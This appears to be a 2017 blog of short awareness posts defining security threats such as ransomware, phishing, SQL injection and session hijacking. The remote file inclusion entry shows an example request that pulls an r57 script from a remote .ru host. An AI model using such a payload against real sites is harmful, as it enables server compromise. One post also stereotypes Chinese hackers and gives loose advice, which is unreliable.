Saturday, 14 October 2017

What is Wifi Eavesdropping ?

Leave a Comment

What is Wifi Eavesdropping ? 

Image result for Wifi Eavesdropping

WiFi eavesdropping is another method used by cyber criminals to capture personal information.
 What it is: Virtual “listening in” on information thats shared over an unsecure (not encrypted) WiFi network.
 What it can do: • Potentially access your computer with the right equipment. • Steal your personal information including logins and passwords.
Read More

What is targeted attack ?

Leave a Comment

What is targeted attack ?

Image result for target attack

Emails can be sent using any “from” email address so it’s possible for someone to send me an email that appears to come from (e.g.) Joe and from a cobourginternet.com address that doesn’t exist.
 In most cases, they will guess the name of the person or use a generic name like “reception”.
 If they work at it, they can find out the name of a worker at your company and use their name.
 So now you are getting an email from someone you know at a legitimate looking address.
 There are security measures (DKIM) that are now more common to make sure that the email does in fact come from the address it claims to be from and these are implemented on all Cobourg Internet sites as well as major email suppliers like Gmail and Yahoo.
 (But maybe the clever Chinese can spoof this too!) You might even reply to the sender by email saying “Did you send this – is it OK to open?” They reply saying “yes”.
 Then once an innocent looking document is opened, you have a hidden program on your computer that can “have its way with you”! It will likely steal personal data and send all your important files back to China.
 It may be months before you find out. You might discover it over coffee when you ask the “sender” “Why did you send me that?” Their blank look and denial tells you you’ve been hacked.
 The best defense here is to be aware and be careful plus don’t belong to a big corporation or a government agency. These hackers don’t spend much effort chasing the little guys.
Read More

What is snooping ?

Leave a Comment

 What is snooping ?

Image result for SnoopingThis is when someone looks through your files in the hopes of finding something interesting whether it is electronic or on paper.

 In the case of physical snooping people might inspect your dumpster, recycling bins, or even your file cabinets; they can look under your keyboard for post-It-notes, or look for scraps of paper tracked to your bulletin board.
 Computer snooping on the other hand, involves someone searching through your electronic files trying to find something interesting.
Read More

What is ransom ware ?

Leave a Comment

What is ransom ware ?

 Image result for What is ransomware ?

What it is: Ransom ware is a type of malware that restricts access to your computer or your files and displays a message that demands payment in order for the restriction to be removed.
 The two most common means of infection appear to be phishing emails that contain malicious attachments and website pop-up advertisements.
 What it can do: There are two common types of ransomware: • Lockscreen ransomware: displays an image that prevents you from accessing your computer • Encryption ransomware: encrypts files on your systems hard drive and sometimes on shared network drives, USB drives, external hard drives, and even some cloud storage drives, preventing you from opening them Ransomware will display a notification stating that your computer or data have been locked and demanding a payment be made for you to regain access.
 Sometimes the notification states that authorities have detected illegal activity on your computer, and that the payment is a fine to avoid prosecution. What you can do: Do not pay the ransom. These threats are meant to scare and intimidate you, and they do not come from a law enforcement agency.
 Even if you submit payment, there is no guarantee that you will regain access to your system. If your computer has been infected (i.e. you are unable to access your computer or your files have been encrypted), contact a reputable computer technician or specialist to find out whether your computer can be repaired and your data retrieved. In order to lessen the impact of a ransomware infection, be sure to regularly back-up your data with a removable external storage drive.
 Its possible that your files might be irretrievable; having an up-to-date backup could be invaluable.
Read More

What is password attack ?

Leave a Comment

What is password attack ?

Related image

Password attack An attacker tries to crack the passwords stored in a network account database or a password-protected file.
 There are three major types of password attacks: a dictionary attack, a brute-force attack, and a hybrid attack.
 A dictionary attack uses a word list file, which is a list of potential passwords.
 A brute-force attack is when the attacker tries every possible combination of characters.
Read More

What is junk mail ?

Leave a Comment

What is junk mail ?

Image result for Junk Mail

You get an email from someone you don’t know, or an impersonal one from your bank – that includes an attachment, a link or a form to complete.
 The email may have the look of the bank or organization but you were not expecting anything (or maybe you were).
 Typically they say “You were not home when we tried to deliver a parcel” Or “your account has been blocked”.
 There are also the ones we’ve come to recognize as scams like “You have won $5,300,000.”.
 But they are all the same – they want you to click the link or open the attachment.
 Never open any links or attachments from someone you don’t know. Some of these are blocked by anti-virus programs but many are not.
 If you think the email might be genuine, phone and ask the sender using a phone number you find elsewhere (not from the email).
 This is the most common method used to attack individuals.
 A lot of such junk mail gets stopped before you see it by anti-virus measures on the servers but some still gets through.q
Read More

What is interception ?

Leave a Comment

What is interception ?

Image result for Computer Interception

This can be either an active or passive process.
 In a networked environment, a passive interception might involve someone who routinely monitors network traffic.
 Active interception might include putting a computer system between sender and receiver to capture information as it is sent.
 From the perspective of interception, this process is covert. The last thing a person on an intercept mission wants is to be discovered.
 Intercept missions can occur for years without the knowledge of the intercept parties.
Read More

What is insider attack ?

Leave a Comment

What is insider attack ?


An insider attack involves someone from the inside, such as a disgruntled employee, attacking the network Insider attacks can be malicious or no malicious.
 Malicious insiders intentionally eavesdrop, steal, or damage information; use information in a fraudulent manner; or deny access to other authorized users.
 No malicious attacks typically result from carelessness, lack of knowledge, or intentional circumvention of security for such reasons as performing a task
Read More

What is Close in Attack ?

Leave a Comment

What is Close in Attack ?

Image result for Close In Attack computer

A close-in attack involves someone attempting to get physically close to network components, data, and systems in order to learn more about a network Close-in attacks consist of regular individuals attaining close physical proximity to networks, systems, or facilities for the purpose of modifying, gathering, or denying access to information.
 Close physical proximity is achieved through surreptitious entry into the network, open access, or both.
 One popular form of close in attack is social engineering in a social engineering attack, the attacker compromises the network or system through social interaction with a person, through an e-mail message or phone.
 Various tricks can be used by the individual to revealing information about the security of company.
 The information that the victim reveals to the hacker would most likely be used in a subsequent attack to gain unauthorized access to a system or network.
Read More

What is backdoor attack ?

Leave a Comment

What is backdoor attack ?

Image result for Backdoor Attack

This can have two different meanings, the original term back door referred to troubleshooting and developer hooks into systems.
 During the development of a complicated operating system orapplication , programmers add back doors or maintenance hooks.
 These back doors allow them to examine operations inside the code while the program is running.
 The second type of back door refers to gaining access to a network and inserting a program or utility that creates an entrance for an attacker.
 The program may allow a certain user to log in without a password or gain administrative privileges.
 A number of tools exist to create a back door attack such as, Back Orifice (Which has been updated to work with windows server 2003 as well as erlier versions), Subseven,NetBus, and NetDevil.
 There are many more. Fortunately, most anti-virus software will recognize these attacks.
Read More

What Is Zero Day Exploits ?

Leave a Comment

What Is Zero Day Exploits ?

Image result for What Is Zero Day Exploits ?

For some hackers, news of a new software patch being released is like Christmas coming early.
 If they look hard enough, vulnerabilities may sometimes be found in new software patches; vulnerabilities that they may exploit before software vendors can discover and patch.
 Zero-day exploits are a lot more common than you might think.
 Last year alone, 3 big zero-day exploits named Heartbleed, Shellshock and POODLE were discovered, along with numerous other vulnerabilities in common software like Internet Explorer.
 Most recently, hackers found a zero-day exploit in Adobe’s Flash Player, another common software found on many computers worldwide.
 Keeping your system safe from the looming threat of zero-day exploits is not easy; it requires you to constantly be in the know about new exploits, and quick action to fix those exploits.
 Of course, sometimes the threat of vulnerabilities could come built into the very computer that you purchased, in which case, you’re more vulnerable.
Read More

What is Sql injection ?

Leave a Comment

What is Sql injection ? 

Related image

SQL Injection uses parameters to run SQL statements via your webpages.
 The SQL statements could be used to dump the contents of a database or to view data such as User IDs, or to manipulate data in the database.
 This is one of the more common attacks.
Read More

What is Remote File Inclusion ?

Leave a Comment

 What is Remote File Inclusion ?

Image result for What is Remote File Inclusion ?RFI tricks existing software on your webpage to access malicious code elsewhere on the internet and to execute it with privileges.

 In your logs this may look like: /Display.php?ArticleID=http://remotesite.ru/r57.txt where http:// is the address where the malicious code is located.
Read More

What Is Distributed attack ?

Leave a Comment

What Is Distributed attack ? 

Image result for distributed attack

A distributed attack requires that the adversary introduce code, such as a Trojan horse or back-door program, to a “trusted” component or software that will later be distributed to many other companies and users Distribution attacks focus on the malicious modification of hardware or software at the factory or during distribution.
 These attacks introduce malicious code such as a back door to a product to gain unauthorized access to information or to a system function at a later date.
Read More

What Is Directory Traversal Local File ?

Leave a Comment

What Is Directory Traversal Local File ? 

Image result for What Is Directory Traversal Local File

Directory traversal is one of the most common attacks occurring today.
 It causes your web application to access a file or program located in another directory that should not be accessible or exposed publicly.
 LFI is similar to Remote File Inclusion (RFI) except the file is located on the same server.
 In this case, the attack is used to gain access to sensitive data such as password files etc.
Read More

What is Defacing?

Leave a Comment

What is Defacing? 

Image result for website defacing

Defacement is a substitution of a web page (or part of a page) by hackers.
 Defacement is the online equivalent of graffiti.
Read More

What Is Cross Site Scripting?

Leave a Comment

What Is Cross Site Scripting ?

Image result for cross site scripting

Cross Site Scripting targets the scripts embedded in a webpage that are executed client-side on your browser such as Javascript, VBScript, Activex, HTML, Flash etc.
 The injected code/scripts can then be used to send malicious code to the user or to steal information from the user rather than from the website or database itself.
 A lot of websites are vulnerable to this type of hacking.
Read More

What is Botnets?

Leave a Comment

What is Botnets?

Image result for Botnets

Botnets are not commonly used for hacking Facebook accounts, because of its high setup costs.
 They are used to carry more advanced attacks. A Botnet is basically a collection of compromised computer.
 The infection process is same as the key logging, however a Botnet gives you additional options for carrying out attacks with the compromised computer.
 Some of the most popular Botnets include Spy eye and Zeus.
Read More

What is Social engineering ?

Leave a Comment

What is Social engineering ? 

Image result for social engineering

Social engineering, in the context of information security, refers to psychological manipulation of people into performing actions or divulging confidential information.
 A type of confidence trick for the purpose of information gathering, fraud, or system access, it differs from a traditional con in that it is often one of many steps in a more complex fraud scheme.

 The term social engineering as an act of psychological manipulation is also associated with the social sciences, but its usage has caught on among computer and information security professionals

 All social engineering techniques are based on specific attributes of human decision-making known as cognitive biases.
 These biases, sometimes called bugs in the human hardware, are exploited in various combinations to create attack techniques, some of which are listed.
 The attacks used in social engineering can be used to steal employees confidential information. The most common type of social engineering happens over the phone.
 Other examples of social engineering attacks are criminals posing as exterminators, fire marshals and technicians to go unnoticed as they steal company secrets.

 One example of social engineering is an individual who walks into a building and posts an official-looking announcement to the company bulletin that says the number for the help desk has changed.
 So, when employees call for help the individual asks them for their passwords and IDs thereby gaining the ability to access the companys private information.
 Another example of social engineering would be that the hacker contacts the target on a social networking site and starts a conversation with the target.
 Slowly and gradually, the hacker gains trust of the target and then uses it to get access to sensitive information like password or bank account details
Read More

What is session hijacking ?

Leave a Comment

What is session hijacking ? 

Image result for session hijacking

In computer science, session hijacking, sometimes also known as cookie hijacking is the exploitation of a valid computer session—sometimes also called a session key—to gain unauthorized access to information or services in a computer system.
 In particular, it is used to refer to the theft of a magic cookie used to authenticate a user to a remote server.
 It has particular relevance to web developers, as the HTTP cookies used to maintain a session on many web sites can be easily stolen by an attacker using an intermediary computer or with access to the saved cookies on the victims computer (see HTTP cookie theft).

 A popular method is using source-routed IP packets.
 This allows an attacker at point B on the network to participate in a conversation between A and C by encouraging the IP packets to pass through Bs machine.

 If source-routing is turned off, the attacker can use blind hijacking, whereby it guesses the responses of the two machines.
 Thus, the attacker can send a command, but can never see the response. However, a common command would be to set a password allowing access from somewhere else on the net.

 An attacker can also be inline between A and C using a sniffing program to watch the conversation.
 This is known as a man-in-the-middle attack.
The Session Hijacking attack consists of the exploitation of the web session control mechanism, which is normally managed for a session token.

 Because http communication uses many different TCP connections, the web server needs a method to recognize every user’s connections.
 The most useful method depends on a token that the Web Server sends to the client browser after a successful client authentication.
 A session token is normally composed of a string of variable width and it could be used in different ways, like in the URL, in the header of the http requisition as a cookie, in other parts of the header of the http request, or yet in the body of the http requisition.

 The Session Hijacking attack compromises the session token by stealing or predicting a valid session token to gain unauthorized access to the Web Server.

 The session token could be compromised in different ways; the most common are:

 Predictable session token;
 Session Sniffing;
 Client-side attacks (XSS, malicious JavaScript Codes, Trojans, etc);
 Man-in-the-middle attack
 Man-in-the-browser attack
Read More

What is malware?

Leave a Comment

What is malware? 

Image result for Malware

What is malware and how can we prevent it?
 Malware is an abbreviated term meaning malicious software.
 This is software that is specifically designed to gain access or damage a computer without the knowledge of the owner.
 There are various types of malware including spyware, keyloggers, true viruses, worms, or any type of malicious code that infiltrates a computer.
 Generally, software is considered malware based on the intent of the creator rather than its actual features.
 Malware creation is on the rise due to the sheer volume of new types created daily and the lure of money that can be made through organized internet crime.
 Malware was originally created as experiments and pranks, but eventually led to vandalism and destruction of targeted machines.
 Today, much of malware is created for profit through forced advertising (adware), stealing sensitive information (spyware), spreading email spam or child pornography (zombie computers), or to extort money (ransomware).
 Various factors can make computers more vulnerable to malware attacks, including defects in the operating system design, having all of the computers on a network run the same OS, giving users to much permissions or just using the Windows OS (due to its popularity, it gets the most malware written for it).
 The best protection from malware continues to be the usual advice: be careful about what email attachments you open, be cautious when surfing and stay away from suspicious websites, and install and maintain an updated, quality antivirus program.
Read More

What is Keystroking ?

Leave a Comment

What is Keystroking ? 

Image result for Keylogger

Keystroke logging, often referred to as keylogging or keyboard capturing, is the action of recording (logging) the keys struck on a keyboard, typically covertly, so that the person using the keyboard is unaware that their actions are being monitored.
 Keylogging can also be used to study human–computer interaction.
 Numerous keylogging methods exist: they range from hardware and software-based approaches to acoustic analysis.

 What is Keylogger?
 A keylogger is a type of surveillance software (considered to be either software or spyware) that has the capability to record every keystroke you make to a log file, usually encrypted.
 A keylogger recorder can record instant messages, e-mail, and any information you type at any time using your keyboard.
 The log file created by the keylogger can then be sent to a specified receiver. Some keylogger programs will also record any e-mail addresses you use and Web site URLsyou visit.
 Keyloggers, as a surveillance tool, are often used by employers to ensure employees use work computers for business purposes only.
 Unfortunately, keyloggers can also be embedded in spywareallowing your information to be transmitted to an unknown third party.
Software-based keyloggers
 These are computer programs designed to work on the target computers software.
 Keyloggers are used in IT organizations to troubleshoot technical problems with computers and business networks.
 Families and business people use keyloggers legally to monitor network usage without their users direct knowledge.
 However, malicious individuals can use keyloggers on public computers to steal passwords or credit card information.

 Hardware keylogger
 Hardware keyloggers are used for keystroke logging, a method of capturing and recording computer users keystrokes, including sensitive passwords.
 They can be implemented via BIOS-level firmware, or alternatively, via a device plugged inline between a computer keyboard and a computer.
 They log all keyboard activity to their internal memory
Read More

What Is Brute Force ?

Leave a Comment

What Is Brute Force ? 

Image result for Hack

In cryptography, a brute-force attack consists of an attacker trying many passwords or passphrases with the hope of eventually guessing correctly.
 The attacker systematically checks all possible passwords and passphrases until the correct one is found.
 Alternatively, the attacker can attempt to guess the key which is typically created from the password using a key derivation function.
 This is known as an exhaustive key search.
 A brute-force attack is a cryptanalytic attack that can, in theory, be used to attempt to decrypt any encrypted data[1] (except for data encrypted in an information-theoretically secure manner).
 Such an attack might be used when it is not possible to take advantage of other weaknesses in an encryption system (if any exist) that would make the task easier.
 When password guessing, this method is very fast when used to check all short passwords, but for longer passwords other methods such as the dictionary attack are used because a brute-force search takes too long.
 Longer passwords, passphrases and keys have more possible values, making them exponentially more difficult to crack than shorter ones.
Brute-force attacks can be made less effective by obfuscating the data to be encoded making it more difficult for an attacker to recognize when the code has been cracked or by making the attacker do more work to test each guess.
 One of the measures of the strength of an encryption system is how long it would theoretically take an attacker to mount a successful brute-force attack against it.
 Brute-force attacks are an application of brute-force search, the general problem-solving technique of enumerating all candidates and checking each one.
 For example, a form of brute force attack known as a dictionary attack might try all the words in a dictionary. Other forms of brute force attack might try commonly-used passwords or combinations of letters and numbers.
 An attack of this nature can be time- and resource-consuming. Hence the name brute force attack; success is usually based on computing power and the number of combinations tried rather than an ingenious algorithm.
 The following measures can be used to defend against brute force attacks:
 Requiring users to have complex passwords
 Limiting the number of times a user can attempt to log in
 Temporarily locking out users who exceed the specified maximum number of login attempts
Read More

What is computer worm?

Leave a Comment

What is computer worm?

Image result for Computer Worms

A computer worm is a standalone malware computer program that replicates itself in order to spread to other computers.
 Often, it uses a computer network to spread itself, relying on security failures on the target computer to access it.
 Unlike a computer virus, it does not need to attach itself to an existing program.
 Worms almost always cause at least some harm to the network, even if only by consuming bandwidth, whereas viruses almost always corrupt or modify files on a targeted computer.

 Many worms that have been created are designed only to spread, and do not attempt to change the systems they pass through.
 However, as the Morris worm and Mydoom showed, even these payload free worms can cause major disruption by increasing network traffic and other unintended effects.
 Countermeasures
 Worms spread by exploiting vulnerabilities in operating systems.
 Vendors with security problems supply regular security updates, and if these are installed to a machine then the majority of worms are unable to spread to it.
 If a vulnerability is disclosed before the security patch released by the vendor, a zero-day attack is possible.
Users need to be wary of opening unexpected email, and should not run attached files or programs, or visit web sites that are linked to such emails.
 However, as with the ILOVEYOU worm, and with the increased growth and efficiency of phishing attacks, it remains possible to trick the end-user into running malicious code.

 Anti-virus and anti-spyware software are helpful, but must be kept up-to-date with new pattern files at least every few days.
 The use of a firewall is also recommended.

 In the April–June, 2008, issue of IEEE Transactions on Dependable and Secure Computing, computer scientists describe a potential new way to combat internet worms.
 The researchers discovered how to contain the kind of worm that scans the Internet randomly, looking for vulnerable hosts to infect.
 They found that the key is for software to monitor the number of scans that machines on a network sends out. When a machine starts sending out too many scans, it is a sign that it has been infected, allowing administrators to take it off line and check it for malware.
 In addition, machine learning techniques can be used to detect new worms, by analyzing the behavior of the suspected computer.

 Users can minimize the threat posed by worms by keeping their computers operating system and other software up to date, avoiding opening unrecognized or unexpected emails and running firewall and antivirus software.[20]

 Mitigation techniques include:
ACLs in routers and switches
 Packet-filters
 TCP Wrapper/ACL enabled network service daemons
 Nullroute
Read More

What is Phishing ?

Leave a Comment

What is Phishing ? 

Image result for Phishing

Phishing is the attempt to obtain sensitive information such as usernames, passwords, and credit card details (and sometimes, indirectly, money), often for malicious reasons, by masquerading as a trustworthy entity in an electronic communication.
 Phishing emails may contain links to websites that are infected with malware.
 Phishing is typically carried out by email spoofing or instant messaging, and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one.
 Phishing is an example of social engineering techniques used to deceive users, and exploits the poor usability of current web security technologies.
 Attempts to deal with the growing number of reported phishing incidents include legislation, user training, public awareness, and technical security measures.
 Many websites have now created secondary tools for applications, like maps for games, but they should be clearly marked as to who wrote them, and users should not use the same passwords anywhere on the internet.
 Phishing is a continual threat, and the risk is even larger in social media such as Facebook, Twitter, and Google+.
 Hackers could create a clone of a website and tell you to enter personal information, which is then emailed to them.
 Hackers commonly take advantage of these sites to attack people using them at their workplace, homes, or in public in order to take personal and security information that can affect the user or company (if in a workplace environment).
 environment).
 Phishing takes advantage of the trust that the user may have since the user may not be able to tell that the site being visited, or program being used, is not real; therefore, when this occurs, the hacker has the chance to gain the personal information of the targeted user, such as passwords, usernames, security codes, and credit card numbers, among other things.

 Types of Phishing Attacks
 Numerous different types of phishing attacks have now been identified. Some of the more prevalent are listed below.

 Deceptive Phishing. The term phishing originally referred to account theft using instant messaging but the most common broadcast method today is a deceptive email message. Messages about the need to verify account information, system failure requiring users to re-enter their information, fictitious account charges, undesirable account changes, new free services requiring quick action, and many other scams are broadcast to a wide group of recipients with the hope that the unwary will respond by clicking a link to or signing onto a bogus site where their confidential information can be collected.
 Malware-Based Phishing refers to scams that involve running malicious software on users PCs. Malware can be introduced as an email attachment, as a downloadable file from a web site, or by exploiting known security vulnerabilitiesa particular issue for small and medium businesses (SMBs) who are not always able to keep their software applications up to date.
software applications up to date.
 Keyloggers and Screenloggers are particular varieties of malware that track keyboard input and send relevant information to the hacker via the Internet.
 They can embed themselves into users browsers as small utility programs known as helper objects that run automatically when the browser is started as well as into system files as device drivers or screen monitors.
 Session Hijacking describes an attack where users activities are monitored until they sign in to a target account or transaction and establish their bona fide credentials.
 At that point the malicious software takes over and can undertake unauthorized actions, such as transferring funds, without the users knowledge.
 Web Trojans pop up invisibly when users are attempting to log in.
 They collect the users credentials locally and transmit them to the phisher.
 Hosts File Poisoning. When a user types a URL to visit a website it must first be translated into an IP address before its transmitted over the Internet.
 The majority of SMB users PCs running a Microsoft Windows operating system first look up these host names in their hosts file before undertaking a Domain Name System (DNS) lookup. By poisoning the hosts file, hackers have a bogus address transmitted,taking the user unwittingly to a fake look alike website where their information can be stolen.
 System Reconfiguration Attacks modify settings on a users PC for malicious purposes.
 For example: URLs in a favorites file might be modified to direct users to look alike websites.
 For example: a bank website URL may be changed from bankofabc.com to bancofabc.com.
 Data Theft. Unsecured PCs often contain subsets of sensitive information stored elsewhere on secured servers.
 Certainly PCs are used to access such servers and can be more easily compromised. Data theft is a widely used approach to business espionage.
 By stealing confidential communications, design documents, legal opinions, employee related records, etc., thieves profit from selling to those who may want to embarrass or cause economic damage or to competitors.
 DNS-Based Phishing (Pharming). Pharming is the term given to hosts file modification or Domain Name System (DNS)-based phishing.
 With a pharming scheme, hackers tamper with a companys hosts files or domain name system so that requests for URLs or name service return a bogus address and subsequent communications are directed to a fake site.
 The result: users are unaware that the website where they are entering confidential information is controlled by hackers and is probably not even in the same country as the legitimate website.
 Content-Injection Phishing describes the situation where hackers replace part of the content of a legitimate site with false content designed to mislead or misdirect the user into giving up their confidential information to the hacker.
 For example, hackers may insert malicious code to log users credentials or an overlay which can secretly collect information and deliver it to the hackers phishing server.
 Man-in-the-Middle Phishing is harder to detect than many other forms of phishing.
other forms of phishing.
 In these attacks hackers position themselves between the user and the legitimate website or system.
 They record the information being entered but continue to pass it on so that users transactions are not affected.
 Later they can sell or use the information or credentials collected when the user is not active on the system.
 Search Engine Phishing occurs when phishers create websites with attractive (often too attractive) sounding offers and have them indexed legitimately with search engines.
 Users find the sites in the normal course of searching for products or services and are fooled into giving up their information.
 For example, scammers have set up false banking sites offering lower credit costs or better interest rates than other banks.
 Victims who use these sites to save or make more from interest charges are encouraged to transfer existing accounts and deceived into giving up their details.
Read More

What is trojan ?

Leave a Comment

What is trojan ? 

Image result for trojan virus

In computing, a Trojan horse is a program that appears harmless, but is, in fact, malicious.
 The term comes from Greek mythology about the Trojan War. According to legend, the Greeks built a large wooden horse that the people of Troy pulled into the city. During the night, soldiers who had been hiding inside the horse emerged, opened the citys gates to let their fellow soldiers in and then overran the city.
 Attackers have long used Trojan horses as a way to trick end users into installing malware.
 Typically, the malicious programming is hidden within an innocent-looking email attachment or free program, such as a game.
 When the user downloads the Trojan horse, the malware that is hidden inside is also downloaded.
 Once inside the computing device, the malicious code can execute whatever task the attacker designed it to carry out.

 A Trojan horse containing malware may also be referred to as simply a Trojan or a Trojan horse virus.
 Unlike a true virus, however, malware in a Trojan horse does not replicate itself, nor can it propagate without the end users assistance.
 Because the user is often unaware that he has installed a Trojan horse, the computing devices security depends upon its antimalware software recognizing the malicious code, isolating it and removing it.

 Unexpected changes to computer settings and unusual activity even when the computer should be idle are strong indications that a Trojan or other malware is residing on a computer.
To avoid being infected by Trojan malware, users should keep their antivirus software up to date, never download files or programs from untrusted sources, and always scan new files with antivirus software before opening them.
Read More